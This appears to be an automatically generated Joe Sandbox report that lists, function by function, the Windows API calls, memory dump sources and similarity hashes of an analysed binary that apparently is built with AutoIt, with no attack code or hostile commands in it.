• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
• Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
• Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
• Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
• Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
• SelectObject.GDI32(?,00000000), ref: 0040135C
• BeginPath.GDI32(?), ref: 00401373
• SelectObject.GDI32(?,00000000), ref: 0040139C
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
• Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
• Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
• Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
APIs
• GetCurrentThreadId.KERNEL32 ref: 00464ABA
• __beginthreadex.LIBCMT ref: 00464AD8
• MessageBoxW.USER32(?,?,?,?), ref: 00464AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
• Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
• Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
• Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
• Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
APIs
• GetLastError.KERNEL32(00000008,?,?,02F515D8,02F53CBB,?,02F51D2A,?,?,00000000), ref: 02F518E4
• _free.LIBCMT ref: 02F51919
• _free.LIBCMT ref: 02F51940
• SetLastError.KERNEL32(00000000,?,02F51D2A,?,?,00000000), ref: 02F5194D
• SetLastError.KERNEL32(00000000,?,02F51D2A,?,?,00000000), ref: 02F51956
Memory Dump Source
• Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 9488a443e0fcacb1a4171f91521b489e4e8094dddd9f5db3099dd73b2bc505c4
• Instruction ID: d9135a9416f6454a4c7df7d763b15927a569ba81bbdd412c73c9e9ed24278ec4
• Opcode Fuzzy Hash: 9488a443e0fcacb1a4171f91521b489e4e8094dddd9f5db3099dd73b2bc505c4
• Instruction Fuzzy Hash: 77012137A456352BA31226746C98B2B3A1E9FC67F47110629FF1EA2241FB6198228860
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
• GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
• GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
• HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
• Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
• Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
• Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
• Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
• Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
• Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
• Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
• Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
• Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
• Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
• Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
• Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
• MessageBeep.USER32(00000000), ref: 0045C226
• KillTimer.USER32(?,0000040A), ref: 0045C242
• EndDialog.USER32(?,00000001), ref: 0045C25C
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
• Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
• Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
• Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
APIs
• _free.LIBCMT ref: 02F53189
  • Part of subcall function 02F52096: HeapFree.KERNEL32(00000000,00000000,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?), ref: 02F520AC
  • Part of subcall function 02F52096: GetLastError.KERNEL32(?,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?,?), ref: 02F520BE
• _free.LIBCMT ref: 02F5319B
• _free.LIBCMT ref: 02F531AD
• _free.LIBCMT ref: 02F531BF
• _free.LIBCMT ref: 02F531D1
Memory Dump Source
• Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d103b84a37de3adc06759aa77a2895e9932919528f85362bf704e6912952ffc5
• Instruction ID: 91d0996209331f89937ea2410f90f279a10b2958217e96a3811f10f9d5da0ff3
• Opcode Fuzzy Hash: d103b84a37de3adc06759aa77a2895e9932919528f85362bf704e6912952ffc5
                                                                              • Instruction Fuzzy Hash: 84F06232D41224AB9630DE78F984C16B3DABE017D4B640C49FF09D7604CF30F8808B60
                                                                              APIs
                                                                              • EndPath.GDI32(?), ref: 004013BF
                                                                              • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                                              • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                                              • DeleteObject.GDI32 ref: 00401401
                                                                              • StrokePath.GDI32(?), ref: 0040141C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                              • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                                              • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                              • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                                              APIs
                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                                              • __swprintf.LIBCMT ref: 00412ECD
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 1943609520-557222456
                                                                              • Opcode ID: a75d18cbb81ebfd378ae05468e5ff70791e623048ba67e4482aec485e8df0e21
                                                                              • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                                              • Opcode Fuzzy Hash: a75d18cbb81ebfd378ae05468e5ff70791e623048ba67e4482aec485e8df0e21
                                                                              • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ContainedObject
                                                                              • String ID: AutoIt3GUI$Container$%I
                                                                              • API String ID: 3565006973-4251005282
                                                                              • Opcode ID: acedc331a202e6bdf9e59912930d66ea5739f8d7afa743188be3a36c8fc2de77
                                                                              • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                                              • Opcode Fuzzy Hash: acedc331a202e6bdf9e59912930d66ea5739f8d7afa743188be3a36c8fc2de77
                                                                              • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__87except__start
                                                                              • String ID: pow
                                                                              • API String ID: 2905807303-2276729525
                                                                              • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                              • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                                              • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                              • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID: 3cA$_A
                                                                              • API String ID: 4104443479-3480954128
                                                                              • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                              • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                                              • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                              • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: SysMonthCal32
                                                                              • API String ID: 2326795674-1439706946
                                                                              • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                              • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                                              • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                              • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                              • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                                              • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
